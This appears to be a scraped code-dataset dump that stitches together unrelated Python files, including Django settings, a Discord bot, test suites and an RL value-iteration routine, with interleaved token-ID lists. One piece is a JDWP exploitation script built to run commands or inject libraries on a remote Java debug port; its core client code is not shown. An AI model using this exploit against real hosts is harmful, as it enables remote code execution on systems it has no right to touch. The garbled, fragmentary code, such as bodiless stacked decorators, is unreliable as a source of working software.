def value_iteration(env, theta=0.0001, discount_factor=1.0):
    """
    Value Iteration Algorithm.

    Args:
        env: OpenAI environment; ``env.env.env.P`` holds the transition model as
            ``P[state][action] -> [(prob, next_state, reward, done), ...]``.
        theta: Stopping threshold. Iteration ends once no state value changes
            by more than this amount in a sweep.
        discount_factor: lambda time discount factor.

    Returns:
        A tuple (policy, V) of the optimal policy and the optimal value function.
    """
    n_states = env.observation_space.n
    n_actions = env.action_space.n
    transitions = env.env.env.P

    def action_values(state, values):
        """Expected value of every action from `state` under value estimate `values`."""
        q = np.zeros(n_actions)
        for action in range(n_actions):
            q[action] = sum(prob * (reward + discount_factor * values[next_state])
                            for prob, next_state, reward, done in transitions[state][action])
        return q

    V = np.zeros(n_states)
    while True:
        largest_change = 0.0
        for state in range(n_states):
            # Greedy one-step lookahead: take the best achievable action value.
            best_value = np.max(action_values(state, V))
            largest_change = max(largest_change, abs(best_value - V[state]))
            V[state] = best_value
        # Converged once no state moved by more than theta in this sweep.
        if largest_change < theta:
            break

    # Build a deterministic policy that is greedy w.r.t. the converged values.
    policy = np.zeros([n_states, n_actions])
    for state in range(n_states):
        policy[state, np.argmax(action_values(state, V))] = 1.0
    return policy, V
if __name__ == '__main__':
    # NOTE(review): `main` is not defined in this part of the file — presumably
    # defined elsewhere in the module; verify before running as a script.
    main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
11748,
11550,
198,
6738,
11550,
1330,
7917,
11799,
198,
11748,
1822,
29572,
198,
11748,
299,
32152,
355,
45941,
628,
198,
4299,
1988,
62,
2676,
341,
7,
24330,
11,
262,
8326,
28,
15,
13,
... | 2.325147 | 1,018 |
#!/usr/bin/python
################################################################################
#
# Universal JDWP shellifier
#
# @_hugsy_
#
# And special cheers to @lanjelot
#
# loadlib option by @ikoz
#
import argparse
import json
import logging
import logging.config
import os
import socket
import struct
import sys
import time
import traceback
import urllib
################################################################################
#
# JDWP protocol variables
#
# Handshake string exchanged right after the TCP connection is established.
HANDSHAKE = "JDWP-Handshake"
# Packet flag byte values: command packet vs. reply packet.
REQUEST_PACKET_TYPE = 0x00
REPLY_PACKET_TYPE = 0x80
# Command signatures
# Each signature is a (command set, command) pair used to build JDWP command packets.
VERSION_SIG = (1, 1)
CLASSESBYSIGNATURE_SIG = (1, 2)
ALLCLASSES_SIG = (1, 3)
ALLTHREADS_SIG = (1, 4)
IDSIZES_SIG = (1, 7)
CREATESTRING_SIG = (1, 11)
SUSPENDVM_SIG = (1, 8)
RESUMEVM_SIG = (1, 9)
SIGNATURE_SIG = (2, 1)
FIELDS_SIG = (2, 4)
METHODS_SIG = (2, 5)
GETVALUES_SIG = (2, 6)
CLASSOBJECT_SIG = (2, 11)
INVOKESTATICMETHOD_SIG = (3, 3)
REFERENCETYPE_SIG = (9, 1)
INVOKEMETHOD_SIG = (9, 6)
STRINGVALUE_SIG = (10, 1)
THREADNAME_SIG = (11, 1)
THREADSUSPEND_SIG = (11, 2)
THREADRESUME_SIG = (11, 3)
THREADSTATUS_SIG = (11, 4)
EVENTSET_SIG = (15, 1)
EVENTCLEAR_SIG = (15, 2)
EVENTCLEARALL_SIG = (15, 3)
# Other codes
# Event-request modifier kinds:
MODKIND_COUNT = 1
MODKIND_THREADONLY = 2
MODKIND_CLASSMATCH = 5
MODKIND_LOCATIONONLY = 7
# Event kind and suspend-policy values:
EVENT_BREAKPOINT = 2
SUSPEND_EVENTTHREAD = 1
SUSPEND_ALL = 2
# Error codes returned by the VM:
NOT_IMPLEMENTED = 99
VM_DEAD = 112
# Method-invocation option and value tags:
INVOKE_SINGLE_THREADED = 2
TAG_OBJECT = 76
TAG_STRING = 115
TYPE_CLASS = 1
################################################################################
#
# JDWP client class
#
if __name__ == "__main__":
    # Configure logging from ./logging.json, parse CLI options, then run the exploit.
    logger = setup_logging(default_path=os.path.join(os.getcwd(), 'logging.json'))

    if sys.version > '3':
        # Lexicographic check on the version string; this tool is python2-only.
        logger.error("Currently only supports python2!")

    parser = argparse.ArgumentParser(description="Universal exploitation script for JDWP by @_hugsy_",
                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument("-t", "--target", type=str, metavar="IP", help="Remote target IP", required=True)
    parser.add_argument("-p", "--port", type=int, metavar="PORT", default=8000, help="Remote target port")
    parser.add_argument("--break-on", dest="break_on", type=str, metavar="JAVA_METHOD",
                        default="java.net.ServerSocket.accept", help="Specify full path to method to break on")
    parser.add_argument("--cmd", dest="cmd", type=str, metavar="COMMAND",
                        help="Specify command to execute remotely")
    parser.add_argument("--loadlib", dest="loadlib", type=str, metavar="LIBRARYNAME",
                        help="Specify library to inject into process load")
    args = parser.parse_args()

    # Split "pkg.Class.method" into class path and method name for the breakpoint.
    class_name, method_name = path_parse(args.break_on)
    setattr(args, "break_on_class", class_name)
    setattr(args, "break_on_method", method_name)

    ret_code = 0
    # FIX: bind `cli` before the try block. Previously, an exception raised inside
    # JDWPClient(...) (e.g. Ctrl-C while connecting) reached the finally clause with
    # `cli` unbound, raising NameError instead of the intended clean exit.
    cli = None
    try:
        cli = JDWPClient(args.target, args.port)
        cli.start()

        if not runtime_exec(cli, args):
            logger.error("[-] Exploit failed")
            ret_code = 1
    except KeyboardInterrupt:
        logger.error("[+] Exiting on user's request")
    except Exception as e:
        logger.error("[-] Exception: %s" % e)
        traceback.print_exc()
        ret_code = 1
        # preserve original behaviour: do not attempt cli.leave() after an unexpected exception
        cli = None
    finally:
        if cli:
            cli.leave()
    sys.exit(ret_code)
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
29113,
29113,
14468,
198,
2,
198,
2,
14499,
28591,
25527,
7582,
7483,
198,
2,
198,
2,
2488,
62,
71,
1018,
1837,
62,
198,
2,
198,
2,
843,
2041,
34550,
284,
2488,
9620,
73,
417,
313,
198,
... | 2.390106 | 1,415 |
import pandas as pd
import trackintel as ti
import trackintel.preprocessing.positionfixes
import trackintel.visualization.positionfixes
import trackintel.io.postgis
@pd.api.extensions.register_dataframe_accessor("as_positionfixes")
class PositionfixesAccessor(object):
    """A pandas accessor to treat (Geo)DataFrames as collections of positionfixes. This
    will define certain methods and accessors, as well as make sure that the DataFrame
    adheres to some requirements.

    Requires at least the following columns:
    ``['user_id', 'tracked_at', 'elevation', 'accuracy', 'geom']``

    Examples
    --------
    >>> df.as_positionfixes.extract_staypoints()
    """

    # Columns every positionfixes (Geo)DataFrame is expected to provide.
    required_columns = ['user_id', 'tracked_at', 'elevation', 'accuracy', 'geom']

    def __init__(self, pandas_obj):
        # NOTE(review): no constructor was present in the original block, yet every
        # method reads self._obj. pandas passes the wrapped (Geo)DataFrame to the
        # accessor constructor, so it is stored here — confirm against upstream.
        self._obj = pandas_obj

    @property
    def center(self):
        """Returns the center coordinate (lon, lat) of this collection of positionfixes."""
        # FIX: removed a stray @staticmethod that was stacked on top of @property —
        # a staticmethod wrapping a property object is not a usable descriptor and
        # made `center` inaccessible.
        lat = self._obj.latitude
        lon = self._obj.longitude
        return (float(lon.mean()), float(lat.mean()))

    def extract_staypoints(self, *args, **kwargs):
        """Extracts staypoints from this collection of positionfixes.

        See :func:`trackintel.preprocessing.positionfixes.extract_staypoints`."""
        return ti.preprocessing.positionfixes.extract_staypoints(self._obj, *args, **kwargs)

    def extract_triplegs(self, *args, **kwargs):
        """Extracts triplegs from this collection of positionfixes."""
        raise NotImplementedError

    def extract_staypoints_and_triplegs(self, *args, **kwargs):
        """Extracts staypoints, uses them to build triplegs, and builds all associations
        with the original positionfixes (i.e., returning everything in accordance with the trackintel
        :doc:`/content/data_model_sql`).

        Returns
        -------
        tuple
            A tuple consisting of (positionfixes, staypoints, triplegs).
        """
        raise NotImplementedError

    def plot(self, *args, **kwargs):
        """Plots this collection of positionfixes.

        See :func:`trackintel.visualization.positionfixes.plot_positionfixes`."""
        ti.visualization.positionfixes.plot_positionfixes(self._obj, *args, **kwargs)

    def to_postgis(self, conn_string, table_name):
        """Stores this collection of positionfixes to PostGIS.

        See :func:`trackintel.io.postgis.write_positionfixes_postgis`."""
        ti.io.postgis.write_positionfixes_postgis(self._obj, conn_string, table_name)
11748,
19798,
292,
355,
279,
67,
198,
11748,
2610,
48779,
355,
46668,
198,
198,
11748,
2610,
48779,
13,
3866,
36948,
13,
9150,
42624,
198,
11748,
2610,
48779,
13,
41464,
1634,
13,
9150,
42624,
198,
11748,
2610,
48779,
13,
952,
13,
7353,... | 2.796149 | 883 |
import os
from pathlib import Path

# Project base directory: two levels above this settings file.
BASE_DIR = Path(__file__).resolve().parent.parent
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
# The secret key is read from the environment so it is never committed.
SECRET_KEY = os.environ.get("CODESPARK_SECRET_KEY")
# NOTE(review): DEBUG must be False in production (see the deployment checklist above).
DEBUG = True
ALLOWED_HOSTS = []
# Application definition.
INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "sass_processor",
    "web",
]
MIDDLEWARE = [
    "django.middleware.security.SecurityMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    "django.middleware.common.CommonMiddleware",
    "django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "django.contrib.messages.middleware.MessageMiddleware",
    "django.middleware.clickjacking.XFrameOptionsMiddleware",
]
# Static-file finders: Django's two defaults plus the SASS compiler's finder.
STATICFILES_FINDERS = [
    "django.contrib.staticfiles.finders.FileSystemFinder",
    "django.contrib.staticfiles.finders.AppDirectoriesFinder",
    "sass_processor.finders.CssFinder",
]
SASS_PROCESSOR_AUTO_INCLUDE = False
ROOT_URLCONF = "codespark.urls"
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
            ],
        },
    },
]
WSGI_APPLICATION = "codespark.wsgi.application"
# Database: MySQL on localhost; credentials supplied via environment variables.
DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.mysql",
        "NAME": "Codespark",
        "USER": os.environ.get("DJANGO_MYSQL_USER"),
        "PASSWORD": os.environ.get("DJANGO_MYSQL_PASSWORD"),
        "HOST": "localhost",
        "PORT": "3306",
    }
}
# Password validation.
AUTH_PASSWORD_VALIDATORS = [
    {
        "NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
    },
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = "pt-br"
TIME_ZONE = "UTC"
USE_I18N = True
USE_TZ = True
# Static files (CSS, JavaScript, images).
STATIC_URL = "static/"
STATICFILES_DIRS = [
    BASE_DIR / "dist",
    "/var/www/static/"
]
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
LOGIN_URL = "/login"
# NOTE(review): STATIC_ROOT is a relative path identical to STATIC_URL; collectstatic
# normally targets an absolute directory outside the source tree — confirm intended.
STATIC_ROOT = "static/"
11748,
28686,
198,
6738,
3108,
8019,
1330,
10644,
198,
198,
33,
11159,
62,
34720,
796,
10644,
7,
834,
7753,
834,
737,
411,
6442,
22446,
8000,
13,
8000,
198,
198,
2,
4091,
3740,
1378,
31628,
13,
28241,
648,
404,
305,
752,
13,
785,
14... | 2.202724 | 1,248 |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 13 11:45:44 2018
@author: 13383861
"""
import sys
sys.path.append('..')
sys.path.append('.')
import typing
import functools
from Utils.AgentObservation import AgentObservation
from Utils.UE4Coord import UE4Coord
from Utils.UE4Grid import UE4Grid
from Utils.BeliefMap import create_belief_map
class ObservationSetManager:
    '''
    Manages the sensor measurements of other agents. Observations don't have to be taken at discrete locations -
    the continuous position can be recorded and the grid location inferred from this.
    Calculating a belief map from these sets of observations requires a grid so that each recorded observation can
    be
    '''
    # NOTE(review): the class docstring above ends mid-sentence — restore the missing text.
    # NOTE(review): no __init__ is visible in this slice; `self.observation_sets` (dict of
    # rav_name -> set of AgentObservation) and `self.agent_name` are presumably initialised
    # elsewhere — verify. The methods `update_rav_obs_set` and `get_all_observations` used
    # below are also defined outside this slice.

    #really strange behaviour: using this initialises the class with observations that don't exist... self.observation_sets[rav_name] = set()
    def init_rav_observation_set(self, rav_name, observations = None):
        '''initialise a new list of observations for a RAV'''
        # An empty/falsy `observations` argument starts the RAV with a fresh empty set.
        if not observations:
            self.observation_sets[rav_name] = set()
        else:
            self.observation_sets[rav_name] = observations

    def get_observation_set(self, rav_name) -> typing.Set[AgentObservation]:
        '''Get list of observations from a RAV'''
        return self.observation_sets[rav_name]

    def update_from_other_obs_list_man(self, other):
        '''Might need to check that the timestamps must be different...'''
        # Merge every RAV's observation set from the other manager into this one.
        for rav_name, observation_set in other.observation_sets.items():
            self.update_rav_obs_set(rav_name, observation_set)

    def get_discrete_belief_map_from_observations(self, grid):
        '''Given a discrete grid, returns a belief map containing the likelihood of the source
        being contained in each grid segment'''
        #ToDo:
        #Currently observations must be made at grid locations - instead compute which observations are made
        #in each grid location and then compute the belief map
        return_belief_map = create_belief_map(grid, self.agent_name)
        return_belief_map.update_from_observations(self.get_all_observations())
        return return_belief_map

    def get_continuous_belief_map_from_observations(self, grid_bounds):
        '''Given grid bounds, returns a function which returns the likelihood given the
        continuous position of the RAV. I.E. transform the discrete PDF as above to a
        continuous one.'''
        # Not implemented yet — placeholder only.
        pass
if __name__ == "__main__":
    # Ad-hoc inline self-tests for ObservationSetManager, run only when this module
    # is executed directly. AgentObservation args appear to be
    # (grid_loc, probability, timestep, timestamp, observer_name) — TODO confirm.
    test_grid = UE4Grid(1, 1, UE4Coord(0,0), 6, 5)
    test_ObservationSetManager = ObservationSetManager('agent1')
    test_ObservationSetManager.observation_sets
    obs1 = AgentObservation(UE4Coord(0,0),0.5, 1, 1234, 'agent2')
    obs2 = AgentObservation(UE4Coord(0,0),0.7, 2, 1235, 'agent2')
    obs3 = AgentObservation(UE4Coord(0,1),0.95, 3, 1237, 'agent2')
    obs4 = AgentObservation(UE4Coord(0,1),0.9, 3, 1238, 'agent1')
    test_ObservationSetManager.init_rav_observation_set('agent2', set([obs1, obs2]))
    test_ObservationSetManager.observation_sets
    test_ObservationSetManager.update_rav_obs_set('agent2', set([obs3]))
    test_ObservationSetManager.get_all_observations()
    assert test_ObservationSetManager.get_observation_set('agent2') == set([obs1, obs2, obs3]), "agent2 observations should have been added to set"
    assert test_ObservationSetManager.get_observation_set('agent1') == set([]), "agent1 observations should be empty"
    # NOTE(review): 'obseravation' looks misspelled — it must match the actual method
    # name on ObservationSetManager (not visible in this slice); verify.
    test_ObservationSetManager.update_with_obseravation(obs4)
    assert not test_ObservationSetManager.get_all_observations().difference(set([obs1, obs2, obs3, obs4]))
    ###################################################
    # Check that duplicate observations aren't added
    test_grid = UE4Grid(1, 1, UE4Coord(0,0), 6, 5)
    test1_ObservationSetManager = ObservationSetManager('agent1')
    obs1 = AgentObservation(UE4Coord(0,0),0.5, 1, 1234, 'agent2')
    obs2 = AgentObservation(UE4Coord(0,0),0.7, 2, 1235, 'agent2')
    obs3 = AgentObservation(UE4Coord(0,1),0.95, 3, 1237, 'agent2')
    test1_ObservationSetManager.update_rav_obs_set('agent2',[obs1, obs2, obs3])
    test1_ObservationSetManager.observation_sets
    #test that duplicate measurements won't occur
    obs4 = AgentObservation(UE4Coord(0,1),0.95, 3, 1237, 'agent2')
    test1_ObservationSetManager.update_rav_obs_set('agent2', set([obs4]))
    assert test1_ObservationSetManager.get_observation_set('agent2') == set([obs1, obs2, obs3]), "Duplicated observations should be ignored"
    # Expected likelihoods below are hard-coded regression values for this grid setup.
    assert abs(test1_ObservationSetManager.get_discrete_belief_map_from_observations(test_grid).get_belief_map_component(UE4Coord(0,0)).likelihood - 0.074468) < 0.0001
    assert abs(test1_ObservationSetManager.get_discrete_belief_map_from_observations(test_grid).get_belief_map_component(UE4Coord(0,1)).likelihood - 0.395833) < 0.0001
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
30030,
5267,
1511,
1367,
25,
2231,
25,
2598,
2864,
198,
198,
31,
9800,
25,
1511,
2548,
2548,
5333,
198,
37811,
198,
198,
11748,
25064,
198,
17597... | 2.607595 | 1,896 |
# CARD CLASSES #
# Marker classes: each card's scoring rule is described in its docstring.
# NOTE(review): 'EoG' presumably means the card scores at End of Game, while
# 'instant' cards score when played — confirm against the game rules.
# AIR #
class EagleCard:
    """Eagle (air, instant) - gain one point instantly, plus two points for each totem block under it"""

class CraneCard:
    """Crane (air, EoG) - gain one point, and additional two points for every crane in a diagonal from it"""

class OwlCard:
    """Owl (air, instant) - one point, additional 2 points for every mouse, snake or Tortoise in this totem"""

class HummingbirdCard:
    """Hummingbird (air, instant) - 4 points if placed second in a totem, otherwise just one"""

class MagpieCard:
    """Magpie (air, instant) - get one point, and one additional point for all air types on your board"""

# EARTH #
class BearCard:
    """Bear (earth, EoG) - if its alone in its totem at the end, get 5 points, otherwise two points"""

class WolfCard:
    """Wolf (earth, instant) - get points: amount of wolves on board x2"""

class FoxCard:
    """Fox (earth, EoG) - if it's in your totem at least twice +4 points (for each), otherwise -3"""

class LynxCard:
    """Lynx (earth, EoG) - get half a point for any mice, fish, foxes and magpies in a one block radius of it"""

class MouseCard:
    """Mouse (earth, EoG) - one point, plus one point for any mice in a one block radius of it"""

# FIRE #
class SnakeCard:
    """Snake (fire, instant) - one point, additional three points for any mice in its totem"""

class ChameleonCard:
    """Chameleon (fire, instant) - one point, is counted as an appropriate animal in further instant effects"""

class CrocodileCard:
    """Crocodile (fire, instant) - one point, add two points for every water animal in its row"""

class TortoiseCard:
    """Tortoise (fire, instant) - one point, plus one point for any other tortoises in its totem or row"""

class GecoCard:
    """Geco (fire, EoG) - one point for every represented element in its totem, six if all are represented"""

# WATER #
class SharkCard:
    """Shark (water, EoG) - one point, plus one point for every totem block under it"""

class CrabCard:
    """Crab (water, EoG) - one point, additional 2 points for any crab in the same row"""

class OctopusCard:
    """Octopus (water, EoG) - copies an EoG card from its totem which yields the most points"""

class FishCard:
    """Fish (water, instant) - five points, but two deducted for any other element in this totem"""

class JellyfishCard:
    """Jellyfish (water, instant) - one point, plus one point for every empty space above it"""
| [
2,
48731,
42715,
1546,
1303,
198,
2,
31600,
1303,
198,
4871,
18456,
16962,
25,
198,
220,
220,
220,
37227,
36,
19345,
357,
958,
11,
9113,
8,
532,
4461,
530,
966,
11101,
11,
5556,
734,
2173,
329,
1123,
49930,
2512,
739,
340,
37811,
62... | 3.260184 | 761 |
from django.conf.urls import patterns, include, url
from manager import views
# URL routes for the manager app: class-based views for the listing/update pages,
# function views for create/update/delete actions.
# NOTE(review): most patterns are not anchored with '$' (e.g. r'^tag' also matches
# 'tagXYZ'); routing relies on the more specific patterns appearing first — confirm.
urlpatterns = [
    url(r'^$', views.IndexView.as_view(), name='administrator'),
    url(r'^tag', views.TagView.as_view(), name='tag'),
    url(r'^updatetag/(?P<tag_id>\d+)', views.TagUpdateView.as_view(), name='updatetag'),
    url(r'^updategroup/(?P<group_id>\d+)', views.GroupUpdateView.as_view(), name='updategroup'),
    url(r'^updategtt/(?P<gtt_id>\d+)', views.GTTUpdateView.as_view(), name='updategtt'),
    url(r'^updateinfo/(?P<gtt_id>\d+)/(?P<info_id>\d+)', views.TagInfoUpdateView.as_view(), name='updateinfo'),
    # ADD
    url(r'^add', views.create, name='add'),
    url(r'^gttadd', views.create_gtt, name='gttadd'),
    url(r'^infoadd', views.create_taginfo, name='infoadd'),
    # update
    url(r'^update', views.update, name='update'),
    url(r'^infoupdate', views.update_taginfo, name='infoupdate'),
    # delete
    url(r'^delete', views.delete, name='delete'),
    url(r'^gtdelete', views.del_gtt, name='gtdelete'),
    url(r'^infodelete', views.del_taginfo, name='infodelete'),
]
6738,
42625,
14208,
13,
10414,
13,
6371,
82,
1330,
7572,
11,
2291,
11,
19016,
198,
6738,
4706,
1330,
5009,
198,
198,
6371,
33279,
82,
796,
685,
628,
220,
220,
220,
19016,
7,
81,
6,
61,
3,
3256,
5009,
13,
15732,
7680,
13,
292,
62,
... | 2.383948 | 461 |
import time
from datetime import datetime
import cairosvg
import gevent
import markovify
import psycopg2
import pygal
from disco.types.channel import Channel as DiscoChannel, MessageIterator, ChannelType
from disco.types.guild import Guild as DiscoGuild
from disco.types.message import MessageTable
from disco.types.permissions import Permissions
from disco.types.user import User as DiscoUser
from disco.util.emitter import Priority
from disco.util.snowflake import to_datetime, from_datetime
from gevent.pool import Pool
from rowboat.models.channel import Channel
from rowboat.models.guild import GuildEmoji, GuildVoiceSession
from rowboat.models.message import Message, Reaction
from rowboat.models.user import User
from rowboat.plugins import RowboatPlugin as Plugin, CommandFail, CommandSuccess
from rowboat.sql import database
from rowboat.tasks.backfill import backfill_channel, backfill_guild
from rowboat.util.input import parse_duration
from rowboat.util.reqaddons import DiscordStyle
| [
11748,
640,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
198,
11748,
1275,
72,
4951,
45119,
198,
11748,
4903,
1151,
198,
11748,
1317,
709,
1958,
198,
11748,
17331,
22163,
70,
17,
198,
11748,
12972,
13528,
198,
6738,
4655,
13,
19199,
13... | 3.831418 | 261 |
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from mymoney.core.validators import MinMaxValidator
from mymoney.tags.models import Tag
from mymoney.tags.serializers import TagSerializer
| [
6738,
42625,
14208,
13,
26791,
13,
41519,
1330,
334,
1136,
5239,
62,
75,
12582,
355,
4808,
198,
198,
6738,
1334,
62,
30604,
1330,
11389,
11341,
198,
198,
6738,
616,
26316,
13,
7295,
13,
12102,
2024,
1330,
1855,
11518,
47139,
1352,
198,
... | 3.651515 | 66 |
import os
import sys
import discord
from discord.ext import commands
import keep_alive
# Bot setup: all gateway intents enabled, commands invoked with the '?' prefix.
intents = discord.Intents.all()
bot = commands.Bot(command_prefix='?', intents=intents)
# NOTE(review): the decorated event/command function bodies are missing below —
# decorators stacked directly on one another (ending on a `for` statement) are a
# SyntaxError. The original handler definitions were presumably lost; restore them
# before this module can run. '總召' is a Discord role name required to invoke
# the guarded commands.
@bot.event
@bot.command()
@commands.has_any_role('總召')
@bot.command()
@commands.has_any_role('總召')
@bot.command()
@commands.has_any_role('總召')
@bot.command()
@commands.has_any_role('總召')
@bot.event
# Load every cog extension found in ./cogs (each <name>.py becomes 'cogs.<name>').
for filename in os.listdir('./cogs'):
    if filename.endswith('.py'):
        bot.load_extension(f'cogs.{filename[:-3]}')
keep_alive.keep_alive()
if __name__ == '__main__':
    # The bot token is supplied via the TOKEN environment variable.
    bot.run(os.environ.get("TOKEN"))
| [
11748,
28686,
198,
11748,
25064,
198,
11748,
36446,
198,
6738,
36446,
13,
2302,
1330,
9729,
198,
198,
11748,
1394,
62,
282,
425,
198,
198,
600,
658,
796,
36446,
13,
5317,
658,
13,
439,
3419,
198,
13645,
796,
9729,
13,
20630,
7,
21812,... | 2.29771 | 262 |
import unittest
from nosedep import depends
| [
11748,
555,
715,
395,
198,
6738,
299,
1335,
538,
1330,
8338,
628
] | 3.75 | 12 |
import unittest
from magic_square_forming import formingMagicSquare
| [
11748,
555,
715,
395,
198,
198,
6738,
5536,
62,
23415,
62,
15464,
1330,
14583,
22975,
48011,
198
] | 4.058824 | 17 |
# Each elevator is modelled as a plain dict:
#   num_persons  - current number of passengers
#   cargo_weight - current cargo load (units not stated in this file — verify)
#   floors       - floors this elevator services
# NOTE(review): floors lists end with ...14,17,16 (unsorted, 15 skipped) — confirm intended.
elevator1 = {
    "num_persons":5,
    "cargo_weight":0,
    "floors":[0,10,11,12,13,14,17,16]
}
elevator2 = {
    "num_persons":10,
    "cargo_weight":150,
    "floors":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,17,16]
}
elevator3 = {
    "num_persons":0,
    "cargo_weight":550,
    "floors":[0,2,4,6,8,10,12,14,16]
}
| [
198,
198,
68,
2768,
1352,
16,
796,
1391,
198,
220,
220,
220,
366,
22510,
62,
19276,
684,
1298,
20,
11,
198,
220,
220,
220,
366,
66,
9448,
62,
6551,
1298,
15,
11,
198,
220,
220,
220,
366,
48679,
669,
20598,
15,
11,
940,
11,
1157,... | 1.630769 | 195 |
"""
tests:
- plot sol_145
"""
import os
import unittest
from cpylog import get_logger2
# Plotting is optional: record whether matplotlib is importable so tests can adapt.
try:
    import matplotlib # pylint: disable=unused-import
    IS_MATPLOTLIB = True
except ImportError: # pragma: no cover
    IS_MATPLOTLIB = False
if IS_MATPLOTLIB:
    #matplotlib.use('Qt5Agg')
    import matplotlib.pyplot as plt
    #try: # pragma: no cover
    #plt.figure()
    #plt.close()
    #except Exception: # pragma: no cover
    # Use the non-interactive Agg backend so the tests run headless.
    plt.switch_backend('Agg')
import pyNastran
from pyNastran.f06.utils import (split_float_colons, split_int_colon,
cmd_line_plot_flutter, cmd_line as cmd_line_f06)
from pyNastran.f06.parse_flutter import plot_flutter_f06, make_flutter_plots
PKG_PATH = pyNastran.__path__[0]
MODEL_PATH = os.path.join(PKG_PATH, '..', 'models')
# Run the module's unit tests when executed directly.
if __name__ == '__main__':  # pragma: no cover
    unittest.main()
| [
37811,
198,
41989,
25,
198,
532,
7110,
1540,
62,
18781,
198,
37811,
198,
11748,
28686,
198,
11748,
555,
715,
395,
198,
6738,
31396,
2645,
519,
1330,
651,
62,
6404,
1362,
17,
198,
28311,
25,
198,
220,
220,
220,
1330,
2603,
29487,
8019,... | 2.244216 | 389 |
"""Tests for visutils.py"""
import faulthandler; faulthandler.enable()
import csv
import datetime
import shutil
#from matplotlib
import cycler
import numpy as np
import pandas as pd
from pandas._testing import assert_frame_equal
import pytest
import matplotlib.pylab as pl
from nna import visutils
from nna.tests import mock_data
from nna.tests.testparams import INPUTS_OUTPUTS_PATH
IO_visutils_path = INPUTS_OUTPUTS_PATH / 'visutils'
test_data_create_time_index = [
(
100,
'270min',
('270T',),
),
(
120,
'2H',
('2H',),
),
(
120,
'continous',
('10S',),
),
]
@pytest.mark.parametrize('row_count,output_data_freq,expected',
test_data_create_time_index)
def test_load_results():
""" test for visutils.load_npy_files.
checks shape approximatly,
checks shape of the array.
"""
tag_name = 'XXX'
channel_count = 2
row_count = 10
# file_length_limit_seconds = 1 * 60 * 60
file_properties_df = mock_data.mock_file_properties_df(row_count)
func_output_path = IO_visutils_path / 'load_results' / 'outputs'
fill_value_func = ones
resulting_output_file_paths = mock_data.mock_results_4input_files(
file_properties_df,
fill_value_func,
func_output_path,
results_tag_id=tag_name,
channel_count=channel_count,
)
results = visutils.load_npy_files(resulting_output_file_paths)
assert results.shape[0] > len(resulting_output_file_paths)
assert results.shape[1] == channel_count
shutil.rmtree(str(func_output_path))
def test_time_index_by_close_recordings():
""" Test for visutils.time_index_by_close_recordings.
"""
row_count = 1000
max_time_distance_allowed = datetime.timedelta(minutes=5)
file_properties_df = mock_data.mock_file_properties_df(row_count)
file_time_index_series = visutils.time_index_by_close_recordings(
file_properties_df,)
for m in range(len(file_time_index_series) - 1):
diff = (file_time_index_series[m + 1] - file_time_index_series[m])
assert diff >= max_time_distance_allowed
assert len(file_properties_df.index) >= len(file_time_index_series)
assert file_properties_df.timestampEnd[-1] == file_time_index_series.iloc[
-1]
assert file_properties_df.timestamp[0] == file_time_index_series.iloc[0]
return file_time_index_series, file_properties_df
def test_export_raw_results_2_csv():
""" Test for visutils.export_raw_results_2_csv.
"""
func_output_path = IO_visutils_path / 'export_raw_results_2_csv' / 'outputs'
func_input_path = IO_visutils_path / 'export_raw_results_2_csv' / 'inputs'
row_count = 100
tag_names = ['XXX']
channel_count = 1
file_properties_df = mock_data.mock_file_properties_df(row_count)
selected_location_ids = list(set(file_properties_df.locationId.values))
fill_value_func = ones
for tag_name in tag_names:
resulting_output_file_paths = mock_data.mock_results_4input_files(
file_properties_df,
fill_value_func,
func_input_path,
results_tag_id=tag_name,
channel_count=channel_count,
)
del resulting_output_file_paths
csv_files_written, no_result_paths = visutils.export_raw_results_2_csv(
func_output_path,
tag_names,
file_properties_df,
# input_data_freq="10S",
# output_data_freq="10S",
# raw2prob_threshold=0.5,
channel=channel_count,
# gathered_results_per_tag=None,
result_files_folder=func_input_path,
# prob2binary_flag=True,
)
assert not no_result_paths
assert len(csv_files_written) == len(selected_location_ids) * len(tag_names)
with open(csv_files_written[0], newline='') as f:
reader = csv.reader(f)
lines = list(reader)
header, lines = lines[0], lines[1:]
assert set(['1']) == set(i[1] for i in lines)
second = datetime.datetime.strptime(lines[11][0], '%Y-%m-%d_%H:%M:%S')
first = datetime.datetime.strptime(lines[10][0], '%Y-%m-%d_%H:%M:%S')
assert (second - first).seconds == 10
assert header[1] == csv_files_written[0].stem.split('_')[-1]
shutil.rmtree(func_input_path)
shutil.rmtree(func_output_path)
return csv_files_written, no_result_paths
def test_vis_preds_with_clipping():
'''Test vis generation.
Requires manual inspection of generated graphs.
'''
func_output_path = IO_visutils_path / 'vis_preds_with_clipping' / 'outputs'
func_input_path = IO_visutils_path / 'vis_preds_with_clipping' / 'inputs'
clipping_results_path = func_input_path / 'clipping_files'
clipping_results_path.mkdir(parents=True, exist_ok=True)
row_count = 100
tag_names = ['XXX']
id2name = {'XXX': 'XXX_name'}
channel_count = 1
input_data_freq = '10S'
output_data_freq = '270min'
